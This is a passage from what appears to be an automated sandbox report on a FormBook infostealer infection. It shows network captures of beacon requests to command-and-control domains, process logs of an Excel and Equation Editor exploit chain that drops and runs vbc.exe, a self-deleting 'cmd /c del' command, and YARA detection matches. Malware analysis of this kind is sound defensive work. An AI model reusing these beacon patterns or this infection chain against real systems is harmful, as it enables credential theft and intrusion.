                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20
                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          5192.168.2.2249172217.160.0.19480C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jul 22, 2021 17:24:59.119234085 CEST211OUTGET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=DD+fNAxrYhECY6o7Z2Ot8DQee/pwekPiIII0s/Xm/SYWktVPhnSE8TJmgfkAm9V0KaSOdQ== HTTP/1.1
                                                                                                                                                          Host: www.theshapecreator.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jul 22, 2021 17:24:59.167316914 CEST211INHTTP/1.1 404 Not Found
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Thu, 22 Jul 2021 15:24:59 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 146
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                          Code Manipulations

                                                                                                                                                          Statistics

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:17:22:47
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0x13fab0000
                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:08
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:543304 bytes
                                                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:11
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:188889 bytes
                                                                                                                                                          MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:11
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:188889 bytes
                                                                                                                                                          MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:15
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:30
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                          File size:141824 bytes
                                                                                                                                                          MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:35
                                                                                                                                                          Start date:22/07/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x4a6c0000
                                                                                                                                                          File size:302592 bytes
                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >